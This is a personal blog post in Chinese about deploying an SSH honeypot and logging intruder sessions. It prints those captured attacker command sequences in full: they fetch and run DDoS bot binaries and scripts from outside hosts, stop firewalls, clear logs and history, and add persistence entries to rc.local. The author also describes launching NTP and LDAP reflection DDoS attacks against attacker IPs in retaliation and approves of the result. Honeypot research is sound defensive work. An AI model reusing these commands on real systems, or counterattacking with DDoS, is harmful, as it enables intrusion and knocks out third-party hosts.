SSH蜜罐捕获记

背景

端午节出去玩之前，为了方便管理内网nas的下载，在路由器上开了frp（内网穿透），把nas的web界面和ssh端口映射到一台外网服务器上。web界面的端口在10000以下，ssh端口在20000以上.
晚上到酒店的时候，登录上nas的web界面，看到日志，有人从路由器（192.168.1.1）对nas进行ssh爆破，1小时一次，尝试的用户名ftpadmin、mysql、root、admin、等等。于是去frp服务器上找日志，日志里面竟然看不到ssh连接的ip。

捕获ip

于是把frp关了，把vps的sshd监听的22端口改到那个端口。

# vim /etc/ssh/sshd_config

修改

Port 22

然后重启sshd

service ssh restart

过了一会儿，用手机的JuiceSSH连上vps，记得改ssh连接端口，查看ssh认证日志

# cat /var/log/auth.log

找到了那个傻吊

Jun 18 18:22:28 xx sshd[31547]: Connection closed by 118.186.17.x [preauth]
Jun 18 18:48:21 xx sshd[31563]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.186.17.x  user=root
Jun 18 18:48:23 xx sshd[31563]: Failed password for root from 118.186.17.x port 34658 ssh2
Jun 18 18:48:23 xx sshd[31563]: Connection closed by 118.186.17.x [preauth]
Jun 18 19:14:20 xx sshd[31570]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.186.17.x  user=root
Jun 18 19:14:21 xx sshd[31570]: Failed password for root from 118.186.17.x port 52498 ssh2
Jun 18 19:14:22 xx sshd[31570]: Connection closed by 118.186.17.x [preauth]
Jun 18 19:17:01 xx CRON[31572]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 18 19:17:01 xx CRON[31572]: pam_unix(cron:session): session closed for user root
Jun 18 19:40:14 xx sshd[31577]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.186.17.x user=root
Jun 18 19:40:16 xx sshd[31577]: Failed password for root from 118.186.17.x port 42118 ssh2

开始还会爆破其他的用户，现在就只爆破root用户了，ssh2中的2是配置文件中的protocol 2

探测ip

查了下ip，是北京那边的。

用LDAP和NTP的方式d了200秒，d的时候是挂了，但是d完又恢复了。以为是家宽。

随即用nmap扫描端口和系统指纹信息，确定目标信息。

Nmap scan report for 118.186.17.x
Host is up (0.075s latency).
Not shown: 993 closed ports
PORT     STATE    SERVICE
443/tcp  open     https
445/tcp  filtered microsoft-ds
2288/tcp open     netml
3306/tcp open     mysql
5800/tcp filtered xxc-http
5900/tcp filtered xxc
8888/tcp open     sun-answerbook
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 19 hops

nc看了下2288,5800,5900，8888
2288,8888是ssh端口
5800,5900是nginx端口

2288有点像是路由器端口映射的感觉，但是d了那么久，如果是路由器早就死了吧。
应该是一台真正的服务器。

ipip.net上面查了下这个ip

地理位置 中国,北京,北京 (电信) 
ASN  4134 （CHINANET-BACKBONE No.31,Jin-rong Street, CN） 
威胁情报：
dshield : 20180620 : 僵尸网络
mirrors : 20180516 : 垃圾邮件
firehol : 20180516 : 恶意软件
firehol : 20180620 : 网络攻击

于是想到在微步威胁情报上查下ip
果然有这个ip的信息
从2017-08-27到现在一直有恶意信息的记录

情报源 	   发现时间 	情报类型
开源情报 	2018-06-11 	扫描
开源情报 	2018-05-29 	可疑
开源情报 	2018-05-10 	可疑
ThreatBook Labs 	2018-05-04 	IDC服务器
开源情报 	2017-11-23 	扫描 已过期
开源情报 	2017-11-16 	可疑
开源情报 	2017-09-20 	恶意软件
开源情报 	2017-09-20 	可疑
开源情报 	2017-09-20 	可疑
开源情报 	2017-09-20 	可疑
开源情报 	2017-09-20 	可疑
开源情报 	2017-09-20 	可疑
开源情报 	2017-09-19 	恶意软件
开源情报 	2017-09-12 	扫描
ThreatBook Labs 	2017-09-01 	僵尸网络
ThreatBook Labs 	2017-09-01 	垃圾邮件,僵尸网络
开源情报 	2017-08-30 	扫描
开源情报 	2017-08-29 	可疑
开源情报 	2017-08-29 	可疑
ThreatBook Labs 	2017-08-27 	垃圾邮件 已过期
ThreatBook Labs 	2016-07-08 	IDC服务器

感觉是一个厉害的家伙。

ssh蜜罐

不如来装个蜜罐，看看这个人ssh进来后会干什么，会下载什么文件，从哪下载，这样会留下更多的信息

搜索了下，看中了这个蜜罐 基于Paramiko的高交互SSH蜜罐 .
是去年8月写的文章，去年4月的时候，我在树莓派上装过kippo，kippo启动也很简单的，clone下来代码，修改下配置文件，就能启动。但是这次我想试试这个新的蜜罐。

这个蜜罐名叫wetland，github开源地址：https://github.com/ohmyadd/wetland

使用docker方式的部署：

安装docker:curl -sSL https://get.docker.com/ | sh

1. 启动sshd的docker

   docker run -d --name sshd rastasheep/ubuntu-sshd

然后运行docker inspect sshd查看这个容器的ip地址
如果这是你的第一个docker容器，ip一般都是172.17.0.2

2. 从环境变量的方式启动wetland

   docker run -d --name wetland -v ~/log:/root/wetland/log -p 22:22 -e SENSOR=test -e SSHDADDR=172.17.0.2 -e BEARYCHAT1='https://hook.bearychat.com/xxx' ohmyadd/wetland

• SENSOR: 传感器，[wetland]的名字
• SSHADDR:sshd的容器ip
• BEARYCHAT: bearychat 的hook地址

bearychat是一个团队协作的平台，可以添加机器人聊天，机器人会有个hook地址，如果有信息，会推送到机器人，机器人再发送给你。

设置方法：
团队后台 - 机器人 - 添加机器人 - 自定义tab - Incoming - 添加，之后会看到形如https://hook.bearychat.com/xxx的hook地址。

启动好了后，我这边测试了下。
ssh [vps-ip] -p [ssh-port]

随便输了两个弱口令，连上了ssh。机器人那边就已经发送了消息，hacker ip为xxxx的连上了sensor为test的ssh。运行了什么命令也能及时看到。

捕获猎物1

之后的两天都没有消息，查看auth.log，发现那个傻逼连上了ssh又退出了:

Jun 19 00:20:37 xx sshd[30738]: Received signal 15; terminating.
Jun 19 00:20:37 xx sshd[2103]: Server listening on 0.0.0.0 port 2368.
Jun 19 00:20:37 xx sshd[2103]: Server listening on :: port 2368.
Jun 19 00:21:56 xx sshd[2128]: pam_unix(sshd:session): session opened for user root by (uid=0)
Jun 19 00:22:29 xx sshd[2128]: pam_unix(sshd:session): session closed for user root
Jun 19 00:31:01 xx CRON[2399]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 00:31:14 xx CRON[2399]: pam_unix(cron:session): session closed for user root
Jun 19 00:31:39 xx sshd[1892]: pam_unix(sshd:session): session closed for user root
Jun 19 01:17:01 xx CRON[3203]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 01:17:01 xx CRON[3203]: pam_unix(cron:session): session closed for user root
Jun 19 02:17:01 xx CRON[3394]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 02:17:01 xx CRON[3394]: pam_unix(cron:session): session closed for user root
Jun 19 03:17:01 xx CRON[3561]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 03:17:01 xx CRON[3561]: pam_unix(cron:session): session closed for user root
Jun 19 04:17:01 xx CRON[3729]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 04:17:01 xx CRON[3729]: pam_unix(cron:session): session closed for user root
Jun 19 05:17:01 xx CRON[3901]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 05:17:01 xx CRON[3901]: pam_unix(cron:session): session closed for user root
Jun 19 06:17:01 xx CRON[4020]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 06:17:01 xx CRON[4020]: pam_unix(cron:session): session closed for user root
Jun 19 07:17:01 xx CRON[4312]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 07:17:01 xx CRON[4312]: pam_unix(cron:session): session closed for user root
Jun 19 08:17:01 xx CRON[4465]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 08:17:01 xx CRON[4465]: pam_unix(cron:session): session closed for user root
Jun 19 09:17:01 xx CRON[4659]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 09:17:01 xx CRON[4659]: pam_unix(cron:session): session closed for user root
Jun 19 10:17:01 xx CRON[4721]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 10:17:01 xx CRON[4721]: pam_unix(cron:session): session closed for user root
Jun 19 11:17:01 xx CRON[4777]: pam_unix(cron:session): session opened for user root by (uid=0)
Jun 19 11:17:01 xx CRON[4777]: pam_unix(cron:session): session closed for user root

非常稳定的一小时一次
只是进入到了ssh认证环节就退出了，蜜罐那边没日志，说明连蜜罐都没进，推测可能是ssh key不同的缘故。
ssh key更改了，ssh连接会提示key不通，需要移除掉老的记录，而脚本没有考虑到这种情况。

于是我换了台快到期的vps，装上蜜罐，等待猎物。

过了一会儿，ipad的bearychat疯狂推送。。

Sensor:	rom
Hacker:	103.42.28.212
MyIP:	172.17.0.3
Action:	login
Content:	login successful

Sensor:	rom
Hacker:	103.42.28.212
MyIP:	172.17.0.3
Action:	exec command
Content:	cd /bin/
curl http://107.150.36.133/g.txt -o ygljglkjgfg0
chmod +x ygljglkjgfg0
/bin/ygljglkjgfg0
wget http://107.150.36.133/g.txt -O ygljglkjgfg1
chmod +x ygljglkjgfg1
/bin/ygljglkjgfg1
good http://107.150.36.133/g.txt -O ygljglkjgfg2
chmod +x ygljglkjgfg2
/bin/ygljglkjgfg2
sleep 2
wget http://107.150.36.133/w.txt -O sdf3fslsdf13
chmod +x sdf3fslsdf13
/bin/sdf3fslsdf13
good http://107.150.36.133/w.txt -O sdf3fslsdf14
chmod +x sdf3fslsdf14
/bin/sdf3fslsdf14
curl http://107.150.36.133/w.txt -o sdf3fslsdf15
chmod +x sdf3fslsdf15
/bin/sdf3fslsdf15
sleep 2
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good
cat /dev/null >/root/.bash_history
ls -la /etc/daemon.cfg
exit $?

Sensor:	rom
Hacker:	103.42.28.212
MyIP:	172.17.0.3
Action:	exec_request
Content:	success

Sensor:	rom
Hacker:	103.42.28.212
MyIP:	172.17.0.3
Action:	exec_request
Content:	success

Sensor:	rom
Hacker:	103.42.28.212
MyIP:	172.17.0.3
Action:	exec command
Content:	ls -la /etc/daemon.cfg

这个小婊砸把我的wget命令 改为good？？
然后下载了两个程序
ls -la /etc/daemon.cfg 应该是确认程序是否正确运行了

先下载g.txt 和 w.txt 传在线分析平台

https://x.threatbook.cn/report/scan/47bf33fd353be8b334f188c839dac4a6a1b71fe220a1c98122628cc5fddabe3d-1513073717870

https://x.threatbook.cn/report/scan/444ccc1249fe4a9ad6a24cea79ec60be45a438405f3c86346ff72433afbb3a71-1513073215948

这是个ddos客户端,准确来说是XordDOS

file看下

─[$] <> file w.txt 
w.txt: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

是可执行文件，不会逆向的菜鸡qwq。。。。
如果会逆向的话，可以追踪下，应该可以找到C&C服务器的地址

后来在freebuf搜到了一篇分析XorDDos的文章， 一次XorDDos变种样本的分析实战记录

后来我就重置了蜜罐。现在回想起来，应该使用netstat 查看下连接，说不定能知道，但是也有可能C&C服务器在下发任务的时候才会连接上，也不知道是主动连接还是被动连接，，，反正程序在咱手上了，什么时候运行下也不就能验证了

文件地址

• g.txt
• w.txt

完了后，给103和107各d 100秒NTP，截止发稿时间是打不开了嘿嘿

捕获猎物2

上一次是在rom机器上，这次回到第一次的机器上，在我记录博客的时候，翻看auth.log，发现有个新的ip(103.219.112.69)在持续的爆破宿主机的ssh，ssh上次已经是改到2000+了，蜜罐在20000+。

改端口的同时，顺便重置下蜜罐吧

docker stop wetland
docker rm wetland

修改宿主机的ssh监听端口
重新运行wetland的docker，把端口改到之前ssh的端口即可。

103没等来，等来了123同学。

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	login
Content:	login successful

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	exec command
Content:	ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=1987

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	exec command
Content:	service iptables stop

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	exec command
Content:	cd /tmp

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	exec command
Content:	wget http://mdb7.cn:8081/exp

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	exec command
Content:	chmod 0777 /root/exp
Sensor:	x

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	exec command
Content:	nohup /root/exp > /dev/null 2>&1 &

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	exec command
Content:	rm -f /var/log/wtmp

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	exec command
Content:	rm -rf exp

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	exec command
Content:	wget -P/tmp http://123.249.27.28:613/pud

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	exec command
Content:	chmod 0777 /tmp/pud

Sensor:	x
Hacker:	123.249.27.28
MyIP:	172.17.0.3
Action:	exec command
Content:	/tmp/./pud

mdb7.cn访问不了

下载pub上传 分析报告

后门+ddos

123.249.27.28 d了50秒NTP，现在挂了
这个ip也是长期嘿产
https://x.threatbook.cn/ip/123.249.27.28

pub文件备份

kill杀了几个进程，这次这个有点垃圾，服务器打挂了不说，程序没有设置自动启动.

刚刚看到github有个kippo-detect的项目，用来检测是不是蜜罐，我觉得这些爆破小子应该先检测下是不是蜜罐

猎物3

Sensor:	rom2
Hacker:	104.223.213.141
MyIP:	172.17.0.3
Action:	exec command
Content:	#!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://104.223.213.141/a21jj
curl -O http://104.223.213.141/a21jj
chmod +x a21jj
./a21jj

Sensor:	rom2
Hacker:	104.223.213.141
MyIP:	172.17.0.3
Action:	exec command
Content:	ls -la /var/run/gcc.pid

root@9197361799fa:~# cat /var/run/gcc.pid
uhukenmftxpilnavmgpzoxmjalenfylb

猎物n？

wget http://96.44.186.214:5414/Linux-syn19001ss
chmod 0755 /root/Linux-syn19001ss
nohup /root/Linux-syn19001ss > /dev/null 2>&1 &
chmod 777 Linux-syn19001ss
./Linux-syn19001ss
chmod 0755 /root/Linux-syn19001ss
nohup /root/Linux-syn19001ss > /dev/null 2>&1 &
chmod 0777 Linux-syn19001ss
chmod u+x Linux-syn19001ss
./Linux-syn19001ss &
chmod u+x Linux-syn19001ss
./Linux-syn19001ss &
cd /tmp
service iptables stop
wget http://96.44.186.214:5414/Linux-udp19001s
chmod 0755 /root/Linux-udp19001s
nohup /root/Linux-udp19001s > /dev/null 2>&1 &
chmod 777 Linux-udp19001s
./164
chmod 0755 /root/Linux-udp19001s
nohup /root/Linux-udp19001s > /dev/null 2>&1 &
chmod 0777 Linux-udp19001s
chmod u+x Linux-udp19001s
./Linux-udp19001s &
chmod u+x dos6cc4
./Linux-udp19001s &
cd /tmp
echo "cd  /root/">>/etc/rc.local
echo "./Linux-syn19001ss&">>/etc/rc.local
echo "./Linux-udp19001s&">>/etc/rc.local
echo "/etc/init.d/iptables stop">>/etc/rc.local

猎物n+1

Sensor:	rom3
Hacker:	173.249.54.210
MyIP:	172.17.0.3
Action:	exec command
Content:	cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://167.99.39.63/8UsA.sh; curl -O http://167.99.39.63/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 167.99.39.63 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 167.99.39.63; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 167.99.39.63 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *

猎物n+2

 29  wget http://96.44.186.214:5414/liuxs512
 30  chmod 0755 /root/liuxs512
 31  nohup /root/liuxs512 > /dev/null 2>&1 &
 32  chmod 777 liuxs512
 33  ./liuxs512
 34  chmod 0755 /root/liuxs512
 35  nohup /root/liuxs512 > /dev/null 2>&1 &
 36  chmod 0777 liuxs512
 37  chmod u+x liuxs512
 38  ./liuxs512 &
 39  chmod u+x liuxs512
 40  ./liuxs512 &
 41  cd /tmp
 42  service iptables stop
 43  wget http://96.44.186.214:5414/liuxs512
 44  chmod 0755 /root/liuxs512
 45  nohup /root/liuxs512 > /dev/null 2>&1 &
 46  chmod 777 liuxs512
 47  ./164
 48  chmod 0755 /root/liuxs512
 49  nohup /root/liuxs512 > /dev/null 2>&1 &
 50  chmod 0777 liuxs512
 51  chmod u+x liuxs512
 52  ./liuxs512 &
 53  chmod u+x dos6cc4
 54  ./liuxs512 &
 55  cd /tmp
 56  echo "cd  /root/">>/etc/rc.local
 57  echo "./liuxs512&">>/etc/rc.local
 58  echo "/etc/init.d/iptables stop">>/etc/rc.local
 59  service iptables stop
 60  wget http://96.44.186.214:5414/liuxs512
 61  chmod 0755 /root/liuxs512
 62  nohup /root/liuxs512 > /dev/null 2>&1 &
 63  chmod 777 liuxs512
 64  ./liuxs512
 65  chmod 0755 /root/liuxs512
 66  nohup /root/liuxs512 > /dev/null 2>&1 &
 67  chmod 0777 liuxs512
 68  chmod u+x liuxs512
 69  ./liuxs512 &
 70  chmod u+x liuxs512
 71  ./liuxs512 &
 72  cd /tmp
 73  service iptables stop
 74  wget http://96.44.186.214:5414/liuxs512
 75  chmod 0755 /root/liuxs512
 76  nohup /root/liuxs512 > /dev/null 2>&1 &
 77  chmod 777 liuxs512
 78  ./164
 79  chmod 0755 /root/liuxs512
 80  nohup /root/liuxs512 > /dev/null 2>&1 &
 81  chmod 0777 liuxs512
 82  chmod u+x liuxs512
 83  ./liuxs512 &
 84  chmod u+x dos6cc4
 85  ./liuxs512 &
 86  cd /tmp
 87  echo "cd  /root/">>/etc/rc.local
 88  echo "./liuxs512&">>/etc/rc.local
 89  echo "/etc/init.d/iptables stop">>/etc/rc.local
 90  ps aux
 91  ifconfig
 92  ip address
 93  address
 94  ipaddress
 95  ipadrss
 96  passwd
 97  /sbin/ifconfig
 98  apt-get install net-tools
 99  /sbin/ifconfig/sbin/ifconfig
100  /sbin/ifconfig
101  who
102  history

还把我密码改了
Sensor: rom3
Hacker: 118.175.87.174
MyIP: 172.17.0.3
Action: shell command
Content: root123

IncomingIncoming
Sensor:	rom3
Hacker:	178.132.0.39
MyIP:	172.17.0.3
Action:	direct_request
Content:	failed
Sensor:	rom3
Hacker:	178.132.0.39
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	62.112.11.81
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	217.23.10.20
MyIP:	172.17.0.3
Action:	direct_request
Content:	failed
Sensor:	rom3
Hacker:	217.23.10.20
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	217.23.10.20
MyIP:	172.17.0.3
Action:	direct_request
Content:	failed
Sensor:	rom3
Hacker:	217.23.10.20
MyIP:	172.17.0.3
Action:	direct_request
Content:	ori:(u'localhost', 8080), dest:(u'172.217.23.206', 80)
Sensor:	rom3
Hacker:	217.23.10.20
MyIP:	172.17.0.3
Action:	direct_request
Content:	failed
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	pip install tldextract
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	apt-get 
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	pip install tldextract
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	apt-get pip install tldextract
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	apt-get install oot@2552467145fa:~# apt-get pip install tldextract
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	root@2552467145fa:~#
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	E: Invalid operation pip
Sensor:	rom3
Hacker:	217.23.12.117
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	217.23.12.117
MyIP:	172.17.0.3
Action:	direct_request
Content:	ori:(u'localhost', 8080), dest:(u'216.58.212.206', 80)
Sensor:	rom3
Hacker:	62.210.37.8
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	62.210.37.8
MyIP:	172.17.0.3
Action:	shell_request
Content:	success
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	apt-get install Python-pip
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	yum install Python-pip
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	apt-get install python-pip
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	y
Sensor:	rom3
Hacker:	217.23.7.25
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	217.23.7.25
MyIP:	172.17.0.3
Action:	direct_request
Content:	ori:(u'127.0.0.1', 26499), dest:(u'204.79.197.200', 80)
Sensor:	rom3
Hacker:	194.88.107.163
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	217.23.10.20
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	217.23.10.20
MyIP:	172.17.0.3
Action:	direct_request
Content:	ori:(u'localhost', 8080), dest:(u'172.217.23.206', 80)
Sensor:	rom3
Hacker:	217.23.10.20
MyIP:	172.17.0.3
Action:	direct_request
Content:	failed
Sensor:	rom3
Hacker:	217.23.10.20
MyIP:	172.17.0.3
Action:	direct_request
Content:	failed
Sensor:	rom3
Hacker:	217.23.10.20
MyIP:	172.17.0.3
Action:	direct_request
Content:	failed
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	sudo apt-get install python-pip python-dev build-essential 
Sensor:	rom3
Hacker:	178.132.0.39
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	178.132.0.39
MyIP:	172.17.0.3
Action:	direct_request
Content:	ori:(u'localhost', 8080), dest:(u'34.207.2.165', 80)
Sensor:	rom3
Hacker:	178.132.0.39
MyIP:	172.17.0.3
Action:	direct_request
Content:	failed
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	sudo apt-get install python-pip python-dev build-essudo apt-get install python-pip python-dev build-essential 
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	apt-get install pip install tldextract
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	pip install tldextract
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	cd /var/tmp/scanner
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	chmod 777 *
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	./start 188
Sensor:	rom3
Hacker:	217.23.7.25
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	217.23.7.25
MyIP:	172.17.0.3
Action:	direct_request
Content:	ori:(u'127.0.0.1', 23550), dest:(u'13.107.21.200', 80)
Sensor:	rom3
Hacker:	217.23.7.25
MyIP:	172.17.0.3
Action:	direct_request
Content:	ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor:	rom3
Hacker:	217.23.7.25
MyIP:	172.17.0.3
Action:	direct_request
Content:	ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell_request
Content:	success
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	ifconfig
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	ifconfig
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	ifconfig
Sensor:	rom3
Hacker:	217.23.7.25
MyIP:	172.17.0.3
Action:	direct_request
Content:	ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	address
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	ipaddress
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	ipadrss
Sensor:	rom3
Hacker:	217.23.7.25
MyIP:	172.17.0.3
Action:	direct_request
Content:	ori:(u'127.0.0.1', 22), dest:(u'practicemanager.xero.com', 443)
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	passwd
Sensor:	rom3
Hacker:	217.23.3.138
MyIP:	172.17.0.3
Action:	direct_request
Content:	ori:(u'localhost', 8080), dest:(u'157.240.20.35', 80)
Sensor:	rom3
Hacker:	217.23.3.138
MyIP:	172.17.0.3
Action:	direct_request
Content:	failed
Sensor:	rom3
Hacker:	217.23.3.138
MyIP:	172.17.0.3
Action:	login
Content:	login successful
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	root123
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	root123
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	/sbin/ifconfig
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	apt-get install net-tools
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	/sbin/ifconfig/sbin/ifconfig(ESC)[5~
Sensor:	rom3
Hacker:	118.175.87.174
MyIP:	172.17.0.3
Action:	shell command
Content:	/sbin/ifconfig

还帮我装pip python